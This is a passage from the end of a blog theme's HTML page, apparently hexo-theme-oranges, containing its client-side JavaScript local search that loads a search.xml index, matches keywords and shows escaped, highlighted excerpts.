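      // both the surrounding text and the match itself. Splitting on a capturing
      // group leaves the matched pieces at the odd indices; the match keeps its
      // original case.
      function highlight(text, keywords) {
        var pattern = new RegExp('(' + keywords.map(escapeRegExp).join('|') + ')', 'gi');
        return text.split(pattern).map(function (piece, idx) {
          var safe = escapeHtml(piece);
          return idx % 2 === 1 ? '<span class="search-keyword">' + safe + '</span>' : safe;
        }).join('');
      }

      // Status line shown instead of results (the span is now closed properly).
      function showMessage(markup) {
        $resultContent.innerHTML = "<ul><span class='local-search-empty'>" + markup + "</span></ul>";
      }

      showMessage("First search, index file loading, please wait...");
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list. Empty pieces (a leading or
            // trailing hyphen) are dropped: an empty keyword would otherwise
            // match every entry and highlight every character position.
            var query = this.value.trim().toLowerCase();
            var keywords = query.split(/[\s\-]+/).filter(function (k) { return k.length > 0; });
            $resultContent.innerHTML = "";
            if (keywords.length === 0) {
              return;
            }
            var str = '<ul class="search-result-list">';
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var orig_data_title = (data.title && data.title.trim()) || "Untitled";
              var data_title = orig_data_title.toLowerCase();
              // Strip tags from the indexed body so matching is on visible text.
              var orig_data_content = (data.content || "").trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              // only match articles with not empty contents
              if (data_content === '') {
                return;
              }
              var first_occur = -1;
              // Every keyword must appear in the title or the body. The excerpt
              // is anchored on where the first keyword occurs in the body, or
              // at the start when it occurs only in the title.
              var isMatch = keywords.every(function (keyword, i) {
                var index_title = data_title.indexOf(keyword);
                var index_content = data_content.indexOf(keyword);
                if (index_title < 0 && index_content < 0) {
                  return false;
                }
                if (i === 0) {
                  first_occur = index_content < 0 ? 0 : index_content;
                }
                return true;
              });
              // 0x05. show search results
              if (!isMatch) {
                return;
              }
              str += "<li><a href='" + escapeHtml(data.url) + "' class='search-result-title'>" + escapeHtml(orig_data_title) + "</a>";
              if (first_occur >= 0) {
                // cut out ~100 characters: 20 before the first hit, 80 after
                var start = Math.max(first_occur - 20, 0);
                var end = start === 0 ? 100 : first_occur + 80;
                end = Math.min(end, orig_data_content.length);
                // slice(start, end) — `end` is an index, not a length as substr
                // would have taken it
                var match_content = orig_data_content.slice(start, end);
                str += '<p class="search-result-abstract">' + highlight(match_content, keywords) + '...</p>';
              }
              str += "</li>";
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              showMessage("No result");
              return;
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function (xhr) {
          $resultContent.innerHTML = "";
          if (xhr.status === 404) {
            showMessage("The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_blank' rel='noopener'>configuration</a>");
          } else {
            showMessage("The request failed, Try to refresh the page or try again later.");
          }
        }
      });
      $(document).on('click', '#search-close-icon', function () {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }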

    var getSearchFile = function() {
      // Start loading the site index; searchFunc attaches the search-box
      // listener once the XML has arrived.
      var indexPath = "/search.xml";
      var inputId = 'search-input';
      var resultId = 'search-result';
      searchFunc(indexPath, inputId, resultId);
    }
  </script>




        





        
  



      </div>
    </div>
  </body>
</html>
